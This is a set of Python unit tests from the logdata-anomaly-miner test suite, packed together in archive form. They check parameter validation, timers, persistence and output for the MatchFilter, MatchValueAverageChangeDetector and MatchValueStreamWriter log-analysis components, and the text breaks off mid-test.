self.aminer_config, None, [self.stream_printer_event_handler]) self.assertRaises(TypeError, MatchFilter, self.aminer_config, "", [self.stream_printer_event_handler]) self.assertRaises(TypeError, MatchFilter, self.aminer_config, b"Default", [self.stream_printer_event_handler]) self.assertRaises(TypeError, MatchFilter, self.aminer_config, True, [self.stream_printer_event_handler]) self.assertRaises(TypeError, MatchFilter, self.aminer_config, 123, [self.stream_printer_event_handler]) self.assertRaises(TypeError, MatchFilter, self.aminer_config, 123.3, [self.stream_printer_event_handler]) self.assertRaises(TypeError, MatchFilter, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler]) self.assertRaises(TypeError, MatchFilter, self.aminer_config, (), [self.stream_printer_event_handler]) self.assertRaises(TypeError, MatchFilter, self.aminer_config, set(), [self.stream_printer_event_handler]) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], ["default"]) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], None) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], "") self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], b"Default") self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], True) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], 123) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], 123.3) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], {"id": "Default"}) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], ()) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], set()) # target_value_list can actually be empty with [] or None. self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], True) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], 123.3) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], set()) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], output_logline="") self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], output_logline=b"Default") self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], output_logline=["default"]) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], output_logline=123.3) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], output_logline=set()) MatchFilter(self.aminer_config, ["Default"], [self.stream_printer_event_handler], ["val"], True) MatchFilter(self.aminer_config, ["Default"], [self.stream_printer_event_handler], [123, 123.2], True) self.assertRaises(ValueError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, MatchFilter, self.aminer_config, ["Default"], [self.stream_printer_event_handler], log_resource_ignore_list=set()) MatchFilter(self.aminer_config, ["Default"], [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/MatchValueAverageChangeDetectorTest.py000066400000000000000000000617151500476301700331530ustar00rootroot00000000000000import unittest from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummySequenceModelElement, DummyNumberModelElement, DummyFixedDataModelElement, DummyMatchContext import time import math from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class MatchValueAverageChangeDetectorTest(TestBase): """Unittests for the MatchValueAverageChangeDetector.""" def test1receive_atom(self): """Test if log atoms are processed correctly.""" start_time = 30 cron_job1 = "match/cron/job1" cron_job2 = "match/cron/job2" parsing_model = DummySequenceModelElement("cron", [DummyNumberModelElement("job1"), DummyFixedDataModelElement("sp", b" "), DummyNumberModelElement("job2")]) # verify that no statistic evaluation is performed, until the minimal amount of bin elements is reached. # first is initial generation of the bins. mvacd = MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, [cron_job1], 10, start_time, False, "Default") for i in range(1, 41): t = start_time + math.pow(i, 7) match_context = DummyMatchContext(b"%d %d" % (t, start_time + i)) match_element = parsing_model.get_match_element("match", match_context) log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), start_time + i, mvacd) mvacd.receive_atom(log_atom) if i < mvacd.min_bin_elements * 2 or i % mvacd.min_bin_elements != 0: self.assertEqual(self.output_stream.getvalue(), "") else: self.assertNotEqual(self.output_stream.getvalue(), "") self.reset_output_stream() # verify that no statistic evaluation is performed, until the start time is reached. mvacd = MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], cron_job2, [cron_job1], 10, start_time, False, "Default") for i in range(41): t = start_time + math.pow(i, 7) match_context = DummyMatchContext(b"%d %d" % (t, i)) match_element = parsing_model.get_match_element("match", match_context) log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), i, mvacd) mvacd.receive_atom(log_atom) if i <= 30 or i < mvacd.min_bin_elements * 2 or i % mvacd.min_bin_elements != 0: self.assertEqual(self.output_stream.getvalue(), "") else: self.assertNotEqual(self.output_stream.getvalue(), "") self.reset_output_stream() mvacd = MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, [cron_job1, cron_job2], 10, start_time, False, "Default") for i in range(1, 41): t = start_time + math.pow(i, 7) t1 = start_time + math.pow(i, 4) match_context = DummyMatchContext(b"%d %d" % (t, t1)) match_element = parsing_model.get_match_element("match", match_context) log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), t1, mvacd) mvacd.receive_atom(log_atom) if i < mvacd.min_bin_elements * 2 or i % mvacd.min_bin_elements != 0: self.assertEqual(self.output_stream.getvalue(), "") else: self.assertNotEqual(self.output_stream.getvalue(), "") self.reset_output_stream() def test2do_timer(self): """Test if the do_timer method is implemented properly.""" mvacd = MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["cron/job1"], 3, 57600, False, "Default") t = time.time() mvacd.next_persist_time = t + 400 self.assertEqual(mvacd.do_timer(t + 200), 200) self.assertEqual(mvacd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(mvacd.do_timer(t + 999), 1) self.assertEqual(mvacd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3persistence(self): """Test the do_persist and load_persistence_data methods.""" mvacd = MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["cron/job1"], 3, 57600, False, "Default") mvacd.stat_data = [("cron/job1", [57600, 57600, (3, 3000.0, 5000000.0, 1000.0, 1000000.0), (2, 30000.0, 500000000.0)])] mvacd.do_persist() with open(mvacd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[["string:cron/job1", [57600, 57600, [3, 3000.0, 5000000.0, 1000.0, 1000000.0], [2, 30000.0, 500000000.0]]]]') mvacd.stat_data = [] mvacd.load_persistence_data() self.assertEqual(mvacd.stat_data, [("cron/job1", [57600, 57600, (3, 3000.0, 5000000.0, 1000.0, 1000000.0), (2, 30000.0, 500000000.0)])]) other = MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["cron/job1"], 3, 57600, False, "Default") self.assertEqual(mvacd.stat_data, other.stat_data) def test4validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, ["default"], None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, None, None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, "", None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, b"Default", None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, True, None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, 123, None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, 123.3, None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, {"id": "Default"}, None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, (), None, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, set(), None, ["/path"], 3, 1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], "", ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], 123, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], 123.2, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], b"", ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], b"default", ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}, ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], [], ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], (), ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], set(), ["/path"], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], True, ["/path"], 3, 1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, [], 3, 1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, [""], 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, "", 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, 123, 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, 123.2, 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, b"default", 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, {"id": "Default"}, 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, (), 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, set(), 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, True, 3, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], None, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], "3", 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], b"3", 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], {"id": 3}, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], [3], 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], [], 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], (), 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], set(), 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], True, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 123.3, 1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], -1, 1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 0, 1) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, None) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, "1") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, b"1") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, {"id": 1}) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, [1]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, ()) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, set()) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, True) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, -1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 0) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1.2) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=None) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=b"True") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode="True") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=123) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=123.22) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode={"id": "Default"}) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=["Default"]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=[]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=()) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=set()) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, debug_mode=True) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id="") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=None) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=b"Default") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=True) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=123) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=123.22) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id={"id": "Default"}) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=["Default"]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=[]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=()) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id=set()) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, persistence_id="Default") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=None) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=b"True") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline="True") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=123) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=123.22) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline={"id": "Default"}) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=["Default"]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=[]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=()) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=set()) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, output_logline=True) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=set()) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=100) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=set()) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=100) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list="") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=True) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=123) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=123.22) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=()) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=set()) MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/MatchValueStreamWriterTest.py000066400000000000000000000240501500476301700314200ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from unit.TestBase import TestBase, DummyFixedDataModelElement, DummySequenceModelElement from io import StringIO, BytesIO, TextIOWrapper, BufferedReader, BufferedRandom, FileIO, BufferedWriter, TextIOBase class MatchValueStreamWriterTest(TestBase): """Unittests for the MatchValueStreamWriter.""" def test1receive_atom(self): """Test if log atoms are processed correctly.""" euro = b"Euro" euro_char = b"\x80" number = b"25537" space = b" " match_context = MatchContext(b"25537 Euro "*100) fdme_number = DummyFixedDataModelElement("s1", number) fdme_sp = DummyFixedDataModelElement("sp", space) fdme_euro = DummyFixedDataModelElement("s2", euro) fdme_euro_char = DummyFixedDataModelElement("s3", euro_char) sme = DummySequenceModelElement("sequence", [fdme_number, fdme_sp, fdme_euro, fdme_sp]) mvsw = MatchValueStreamWriter(self.output_stream, ["match/sequence/s1", "match/sequence/sp", "match/sequence/s2", "match/sequence/sp"], b";", b"-") match_element = sme.get_match_element("match", match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, mvsw) # This test case sets up a set of values, which are all expected to be matched. mvsw.receive_atom(log_atom) mvsw.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), "25537; ;Euro; \n"*2) self.reset_output_stream() # The seperator string is empty, so all values are expected to be one string. mvsw.separator = b"" mvsw.missing_value_string = b"-" mvsw.receive_atom(log_atom) mvsw.receive_atom(log_atom) mvsw.receive_atom(log_atom) mvsw.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), "25537 Euro \n"*4) self.reset_output_stream() # The missing value string is empty, so when a string does not match it is simply ignored. mvsw.separator = b";" mvsw.missing_value_string = b"" mvsw.receive_atom(log_atom) mvsw.receive_atom(log_atom) mvsw.receive_atom(log_atom) mvsw.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), "25537; ;Euro; \n"*4) self.reset_output_stream() # a set of values which are all expected to be matched with missing values. mvsw.separator = b";" mvsw.missing_value_string = b"-" mvsw.receive_atom(log_atom) mvsw.receive_atom(log_atom) mvsw.receive_atom(log_atom) other_sme = DummySequenceModelElement("sequence", [fdme_number, fdme_sp]) match_element = other_sme.get_match_element("match", match_context) other_log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, mvsw) mvsw.receive_atom(other_log_atom) self.assertEqual(self.output_stream.getvalue(), "25537; ;Euro; \n"*3 + "25537; ;-;-\n") self.reset_output_stream() # multiple spaces, but "Euro" string is missing. mvsw = MatchValueStreamWriter(self.output_stream, ["match/sequence/s1", "match/sequence/sp", "match/sequence/s2", "match/sequence/sp", "match/sequence/sp"], b";", b"-") match_context = MatchContext(b"25537 ") mvsw.receive_atom(log_atom) mvsw.receive_atom(log_atom) mvsw.receive_atom(log_atom) other_sme = DummySequenceModelElement("sequence", [fdme_number, fdme_sp, fdme_sp]) match_element = other_sme.get_match_element("match", match_context) other_log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, mvsw) mvsw.receive_atom(other_log_atom) self.assertEqual(self.output_stream.getvalue(), "25537; ;Euro; ;-\n"*3 + "25537; ;-; ;-\n") self.reset_output_stream() # multiple spaces, but "Euro" string is missing and only one space path being searched. mvsw = MatchValueStreamWriter(self.output_stream, ["match/sequence/s1", "match/sequence/s3", "match/sequence/sp"], b";", 